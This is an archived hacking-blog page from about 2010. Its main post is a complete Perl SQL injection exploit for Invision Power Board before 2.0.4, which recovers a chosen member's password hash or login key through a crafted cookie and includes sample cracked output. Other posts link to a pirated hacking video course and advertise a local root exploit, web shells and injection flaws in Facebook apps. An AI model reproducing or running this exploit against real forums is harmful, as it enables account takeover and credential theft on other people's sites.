October 2010 | Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

The Hack-Counter Hack Training Course






The Hack-Counter Hack Training Course | English | RS | HF | ULD | 999MB

* Combination of talking-head video, slideshow presentation and video capture of actual screen shots
* Walks through setting up "lab" environment and then experimenting with tools on lab PC's
* Includes suite of hacker / security tools for both Windows and Linux platforms on CD
* Requires RealOne Player (freely available) because video presentation is in RealVideo format
* Good program to use in combination with Ed Skoudis' book: Counter Hack
* Mainly for beginners but may even provide some new tricks to seasoned gurus

CD1 Content
Session 1
# Understand the Purpose of the Course and the Phases of Hacking
# Acquire the Hardware and Software for Your Laboratory
# Build the Windows® 2000/XP Hacker Tool Analysis Laboratory
# Build the Linux Hacker Tool Analysis Laboratory
# Test Your Laboratory and Keep It Secure

Session 2
# Understand Low-Tech and Computer-Based Reconnaissance
# Use Sam Spade to Gather Information About Target
# Search the Web for Interesting Target Information

Session 3
# Understand Scanning Techniques
# Search for Modems Using THC-Scan
# Develop a Network Map Using Cheops-ng
# Conduct a Port Scan Using Nmap
# Scan for Vulnerabilities Using Nessus

CD2 Content
Session 4
# Analyze Buffer Overflows
# Passwords on Windows® and Linux
# Sniff Data from the Network Using Sniffit
# Use Netcat, the Swiss Army Knife™ of Hacker Tools

Session 5
# Analyze an Application-Level Trojan Horse Backdoor (VNC)
# Analyze a Traditional RootKit (LRK4)
# Analyze a Kernel-Level RootKit (Kernel Intrusion System)

Session 6
# Understand File Hiding in Windows®
# Understand File Hiding in UNIX
# Analyze Protocol Tunneling Using Reverse WWW Shell
# Analyze Covert Channels Using Covert_TCP



Download HotFile:
http://hotfile.com/dl/30681801/c9fcb36/Hack_Training_Video_Course_CD1.part1.rar.html
http://hotfile.com/dl/30681797/d5e1308/Hack_Training_Video_Course_CD1.part2.rar.html
http://hotfile.com/dl/30681886/749794e/Hack_Training_Video_Course_CD1.part3.rar.html
http://hotfile.com/dl/30681922/eb4db58/Hack_Training_Video_Course_CD1.part4.rar.html
http://hotfile.com/dl/30681925/56c9598/Hack_Training_Video_Course_CD1.part5.rar.html
http://hotfile.com/dl/30681926/c779bb9/Hack_Training_Video_Course_CD2.part1.rar.html
http://hotfile.com/dl/30681927/641f59a/Hack_Training_Video_Course_CD2.part2.rar.html
http://hotfile.com/dl/30681929/4a846b2/Hack_Training_Video_Course_CD2.part3.rar.html
http://hotfile.com/dl/30681931/22d7125/Hack_Training_Video_Course_CD2.part4.rar.html
http://hotfile.com/dl/30681935/6bc0a6c/Hack_Training_Video_Course_CD2.part5.rar.html

Download Sharingmatrix:
http://sharingmatrix.com/file/1996263/Hack Training Video Course CD1.part1.rar
http://sharingmatrix.com/file/1996255/Hack Training Video Course CD1.part2.rar
http://sharingmatrix.com/file/1996335/Hack Training Video Course CD1.part3.rar
http://sharingmatrix.com/file/1996345/Hack Training Video Course CD1.part4.rar
http://sharingmatrix.com/file/1996337/Hack Training Video Course CD1.part5.rar
http://sharingmatrix.com/file/1996383/Hack Training Video Course CD2.part1.rar
http://sharingmatrix.com/file/1996385/Hack Training Video Course CD2.part2.rar
http://sharingmatrix.com/file/1996389/Hack Training Video Course CD2.part3.rar
http://sharingmatrix.com/file/1996391/Hack Training Video Course CD2.part4.rar
http://sharingmatrix.com/file/1996387/Hack Training Video Course CD2.part5.rar

Download Uploading:
http://uploading.com/files/f6773cf1/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part1.rar/
http://uploading.com/files/ec19fem3/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part2.rar/
http://uploading.com/files/2647f23c/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part3.rar/
http://uploading.com/files/3mcmm1b4/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part4.rar/
http://uploading.com/files/48bm6faf/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part5.rar/
http://uploading.com/files/fm216f43/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part1.rar/
http://uploading.com/files/cma4d258/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part2.rar/
http://uploading.com/files/c77429c7/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part3.rar/
http://uploading.com/files/14575adf/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part4.rar/
http://uploading.com/files/bd554e37/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part5.rar/

Download Rapidshare:
http://rapidshare.com/files/357416955/Hack_Training_Video_Course_CD1.part1.rar.html
http://rapidshare.com/files/357416872/Hack_Training_Video_Course_CD1.part2.rar.html
http://rapidshare.com/files/357417783/Hack_Training_Video_Course_CD1.part3.rar.html
http://rapidshare.com/files/357417977/Hack_Training_Video_Course_CD1.part4.rar.html
http://rapidshare.com/files/357418131/Hack_Training_Video_Course_CD1.part5.rar.html
http://rapidshare.com/files/357418360/Hack_Training_Video_Course_CD2.part1.rar.html
http://rapidshare.com/files/357418252/Hack_Training_Video_Course_CD2.part2.rar.html
http://rapidshare.com/files/357418247/Hack_Training_Video_Course_CD2.part3.rar.html
http://rapidshare.com/files/357418298/Hack_Training_Video_Course_CD2.part4.rar.html
http://rapidshare.com/files/357418267/Hack_Training_Video_Course_CD2.part5.rar.html
Regards,
Adnan Anjum From http://hackguide4u.blogspot.com


Read More Add your Comment 2 comments


Tutorials



Courses

All Computer Courses
Ms Office
Adobe Photoshop
Adobe Flash
Corel Draw
Inpage Urdu
Adobe Premier
Adobe PageMaker
BlueVoda
Dreamviewer

All Courses Here in Zip and Document and Notes Formats

Watch Tips Tricks Here


Adobe Flash Course and Contents Download Here

Networking

Programming

PHP Urdu Tutorial



Read More Add your Comment 2 comments


Invision Power Board SQL injection exploit by RST/GHC



#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (&lt2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~]    SERVER : blah.com
## [~]      PATH : /ipb13/
## [~] MEMBER ID : 1
## [~]    TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com  /ipb202/ 1 1
## [~]    SERVER : blah.com
## [~]      PATH : /ipb202/
## [~] MEMBER ID : 1
## [~]    TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV &lt 4) { &usage; }

$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];
$target    = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~]    SERVER : $server\r\n";
print "[~]      PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~]    TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
 {
 if(length($allchar) &gt 0){
 print qq{\b\b DONE ]

 MEMBER ID : $member_id
 };
 print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
 print $allchar."\r\n";
 }
 else
 {
 print "\b\b FAILED ]";
 }
 exit();
 }
else
 {
  $allchar .= chr(42);
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)&lt5) { $i=crack($fmin,$fmax); return $i; }

 $r = int($fmax - ($fmax-$fmin)/2);
 $check = " BETWEEN $r AND $fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }

sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i&lt$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }

sub check($)
 {
 $n++;
 status();
 $ccheck = $_[0];
 $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
 $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
 $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
 $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
 $nmalykh    = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
 $socket = IO::Socket::INET-&gtnew( Proto =&gt "tcp", PeerAddr =&gt "$server", PeerPort =&gt "80");

 printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
 $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);

 while(&lt$socket&gt)
  {
  if (/Set-Cookie: session_id=0;/) { return 1; }
  }

 return 0;
 }

sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b\b/]";  }
  if($status==1){ print "\b\b-]";  }
  if($status==2){ print "\b\b\\]"; }
  if($status==3){ print "\b\b|]";  }
}

sub usage()
 {
 print q(
 Invision Power Board v &lt 2.0.4 SQL injection exploit
 ----------------------------------------------------
 USAGE:
 ~~~~~~
 r57ipb2.pl [server] [/folder/] [member_id] [target]

 [server]    - host where IPB installed
 [/folder/]  - folder where IPB installed
 [member_id] - user id for brute

 targets:
          0 - IPB 1.*
          1 - IPB 2.* (Prior To 2.0.4)

 e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
 ----------------------------------------------------
 (c)oded by 1dt.w0lf
 RST/GHC , http://rst.void.ru , http://ghc.ru
 );
 exit();
 }




Read More Add your Comment 0 comments


2007-2008-2009-2010-2011 local r00t exploit Click Download !




Read More Add your Comment 1 comments


All Good shells which hard to find




Read More Add your Comment 2 comments


Hack some facebook apps (apps.facebook.com vulnerable to SQL and html Injection )



 From Adnan Anjum Founder Of http://hackguide4u.blogspot.com
This is very strange think facebook have sql vulnerability





 Some info for all of you injector team broke facebook code
Special Thanks To TeAM inj3ct0r
Part 1 Original: http://inj3ct0r.com/exploits/11638
Part 2 Original: http://inj3ct0r.com/exploits/13403 


Read More Add your Comment 1 comments


 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com